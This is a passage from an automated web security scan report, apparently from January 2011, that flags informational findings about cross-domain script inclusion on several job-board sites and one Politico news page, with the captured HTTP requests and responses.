...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.394. http://www.physicalsecuritycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.physicalsecuritycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gi8upuba219celoic2370527h4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106914

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.395. http://www.physicaltherapycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.physicaltherapycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116104

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.396. http://www.planningcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.planningcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108598

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.397. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.politico.com
Path:	/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2473
http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://pixel.quantserve.com/api/segments.json?a=p-7bhLrd63bC8jI&callback=qc_callback
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html HTTP/1.1
Host: www.politico.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Node: Cluster Node 1
Last-Modified: Wed, 29 Dec 2010 21:27:36 GMT
ETag: "23584b9-10030-3ce38200"
Content-Type: text/html
Cache-Control: max-age=0
Expires: Fri, 21 Jan 2011 23:39:49 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   xmlns:og="http://ope
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7bhLrd63bC8jI&callback=qc_callback"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2473"></script>
...[SNIP]...
</ul>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.398. http://www.postdoctoralfellowcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postdoctoralfellowcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102645

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.399. http://www.prcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:35 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.400. http://www.preferredresumes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.preferredresumes.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:29 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Resume Writing Services, Professional Resume Writing, Cover Letter Writing
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.401. http://www.procurementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.procurementcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101019

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.402. http://www.productmanagercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.productmanagercrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.403. http://www.projectmanagementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.projectmanagementcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
